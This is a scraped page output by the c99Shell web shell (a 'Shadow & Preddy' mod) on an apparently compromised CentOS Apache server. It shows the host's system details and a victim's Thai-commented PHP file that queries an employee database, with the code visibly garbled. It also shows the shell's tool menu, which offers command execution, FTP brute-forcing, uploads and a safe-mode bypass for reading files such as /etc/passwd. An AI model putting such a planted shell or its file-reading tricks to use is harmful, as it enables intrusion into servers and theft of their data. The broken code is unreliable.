!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/ws_standard_on_mis/   drwxr-xr-x
Free 52.81 GB of 127.8 GB (41.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     testdatabase5.php (2.56 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
/*
กำหนดค่า DSN หากฐานข้อมูลต้องการ User และ Password ก็ให้กำหนดด้วย 
เช่นจะใช้ DSN ชื่อ phptest ส่วน user และ password ไม่ใช้ก็ดังนี้ 

$dsn="asset";
$uid="";
$pwd="";


 ฟังก์ชันติดต่อ ต้องการให้ผ่านค่าทั้ง 3 เข้าไป และจะคืนค่าออกมา เราก็รับค่าที่คืนออกมาลงตัวแปร 
เช่นลงที่ hdn โดยที่หากติดต่อสำเร็จ hdn จะมีค่าเป็นหมายเลขบวกเพื่อนำใชกับฟังก์ชันอื่นต่อไป
หากติดต่อไม่ได้ hdn จะเป็นเท็จ ก็ควรจะมีการตรวจสอบว่า เป็นเท็จหรือไม่ 
หากใช่ก็จะได้ให้ลิกงานเลย แต่ในที่นี้ผมไม่ได้เขียนเอาไว้ ให้ทำเองครับ

$hdn = odbc_connect($dsn,$uid,$pwd);

// กำหนดคำสั่ง SQL ที่จะใช้ และใช้
$sql="select * from TAsset";
$fdn= odbc_exec($hdn, $sql);

//หาจำนวนคอลัมน์และนำชื่อคอลัมน์ออกมาแสดงไปทีละคอลัมน์
$nf= odbc_num_fields($fdn); 
echo "<table border=1><tr  bgcolor=skyblue align=center>";
for($i=1;$i<=$nf;$i++){ 
    echo "<td>",odbc_field_name($fdn,$i),"</td>";
    }
echo "</tr>";

// แสดงรายการไปทีละรายการ รายการละทีคอลัมน์จนกว่าจะหมด
while (odbc_fetch_row($fdn)){
for($i=1;$i<=$nf;$i++){ 
    echo "<td> ",odbc_result($fdn,$i),"</td>";
    }
echo "</tr>";
}
echo "</table>";

// ยกเลิก ปิดการติดต่อ
odbc_close($hdn);
*/
?>









<?

//$dsn="staff";

//$sql="select * from TEmployee, TWorkStatus where work_status.TEmployee=id.TWorkStatus";

?>


<?
$dsn_name "staff1";
$username =""
$password =""
$connectodbc_connect($dsn_name$username$password) or die("ติดต่อ DSN ไม่ได้"); 
//$sql = "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";
$sql "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";
$execute odbc_exec($connect$sql) or die ("เอ็กซิคิวส์คำสั่งไม่ได้");
$num odbc_num_rows($execute);
?>
<table border="1" width="371">
<tr> 
<td width="32"> 
<div align="center">id</div>
</td>
<td width="132"> 
<div align="center">name</div>
</td>
<td width="185"> 
<div align="center">surname</div>
</td>
</tr>
</table>
<? 
$i=1;
$num1=0;
while(odbc_fetch_row($execute,$i))
{
    $num1++;
$id=odbc_result($execute,"id");
$name=odbc_result($execute,"fname");
$surname=odbc_result($execute,"lname");
?>
<table border="1" width="370">
<tr> 
<td width="35"> 
<div align="center"> 
<? echo "$id"?>
</div>
</td>
<td width="129"> 
<? echo "$name"?>
</td>
<td width="184"> 
<? echo "$surname"?>
</td>
</tr>
</table>
<?
$i++;
}

echo "$num1";
?>
<?
odbc_close($connect);
?>
<hr>







<?

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0113 ]--